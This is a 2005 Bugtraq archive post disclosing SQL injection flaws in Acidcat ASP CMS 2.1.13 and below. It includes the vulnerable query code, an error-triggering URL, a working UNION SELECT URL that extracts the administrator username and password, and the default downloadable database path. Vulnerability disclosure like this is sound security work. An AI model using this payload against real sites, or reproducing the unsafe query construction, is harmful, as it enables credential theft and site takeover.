Bugtraq mailing list archives
Acidcat ASP CMS Multiple Vulnerabilities
From: h e <het_ebadi () yahoo com>
Date: Tue, 20 Dec 2005 09:03:34 -0800 (PST)
http://hamid.ir Acidcat CMS is a web site and simple content management system that can be administered via a web browser. It is free for non-commercial use.Acidcat CMS is also an open source product. The product has been found to contain multiple security vulnerabilities allowing a remote attacker to find administrator username and password. Acidcat ASP CMS :http://www.acidcat.com Credit: The information has been provided by Hamid Ebadi (Hamid Network Security Team):admin () hamid ir. The original article can be found at: http://hamid.ir/security/ Vulnerable Systems: * Acidcat CMS v 2.1.13 and below Example : The following URL can be used to trigger an SQL injection vulnerability in the main_content.asp page: http://localhost/acidcat/default.asp?ID=1' Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression 'ID = 1'''. /main_content.asp, line 16 Vulnerable Code: The following lines in main_content.asp Item.Source = "SELECT * FROM Item WHERE ID = "+ Item__MMColParam.replace(/'/g, "''") + ""; Exploit: The following URL will illustrate how you can easily find administrator username and password by entering the following URL: http://localhost/acidcat/default.asp?ID=26 union select 1,username,3,password,5,6 from Configuration The base path of the login is : http://localhost/acidcat/main_login.asp Database Download: The database can be downloaded over the web (default installation).it can be found on http://localhost/acidcat/databases/acidcat.mdb Signature __________________________________________________ Do You Yahoo!? Tired of spam? Yahoo! Mail has the best spam protection around http://mail.yahoo.com
Current thread:
- Acidcat ASP CMS Multiple Vulnerabilities h e (Dec 20)